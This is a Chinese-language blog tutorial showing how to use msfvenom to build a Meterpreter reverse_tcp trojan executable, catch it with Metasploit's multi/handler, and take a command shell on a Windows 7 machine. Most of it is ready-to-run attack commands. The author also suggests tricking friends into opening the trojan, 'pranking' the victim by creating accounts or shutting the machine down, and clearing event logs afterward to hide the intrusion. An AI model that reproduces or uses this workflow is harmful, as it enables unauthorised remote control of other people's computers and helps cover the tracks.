KALI--msfvenom生成远程控制木马入侵win7

远程木马生成入侵Windows

木马是之留在计算机里的后门文件,攻击者可以在预留的木马文件进行远程控制

测试环境如下

win7靶机IP地址:172.16.240.129

KALI的IP地址:192.168.17.128

利用模块:msfvenom

监听端口:6666

1.输入木马生成语句

//示范语句
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.17.128(攻击者的ip) lport=6666(端口号) -f exe > /root/shell.exe (这是生成在root目录下的shell.exe文件)

//演示语句
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.17.128 lport=6666 -f exe > /root/shell.exe

生成成功显示

2019-11-05 16-39-40 的屏幕截图.png

2019-11-05 16-40-54 的屏幕截图.png

 

2.打开msfconsole

msfconsole

2019-11-05 16-44-34 的屏幕截图.png

3.打开监听模块

use exploit/multi/handler 

2019-11-05 16-46-01 的屏幕截图.png

4.设置攻击负载

set payload windows/meterpreter/reverse_tcp

2019-11-05 16-46-58 的屏幕截图.png

5.设置KALI的IP地址

2019-11-05 16-49-14 的屏幕截图.png

 

6.设置监听端口

set LPORT 6666

2019-11-05 16-51-23 的屏幕截图.png

7.开始监听

exploit

2019-11-05 16-52-33 的屏幕截图.png

 

8.之后把木马程序拷贝到我们的win7靶机上,双击打开(社会工程学,可以诱导一下你的好朋友,但请勿做出违法行为)

2019-11-05 16-42-49 的屏幕截图.png

 

9.成功获取到权限

2019-11-05 16-56-00 的屏幕截图.png

进入cmd控制

shell

2019-11-05 16-57-03 的屏幕截图.png

可以开始你的表演了,创建些账户之类的,关机啊什么的稍微恶搞一下

!!!之后记得exit清楚日志操作clearve

2019-11-05 16-59-35 的屏幕截图.png

 

--小顾

 

 

本博客所有文章如无特别注明均为原创。作者:GS小顾复制或转载请以超链接形式注明转自 世纪博客
原文地址《KALI--msfvenom生成远程控制木马入侵win7
分享到:更多

相关推荐

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)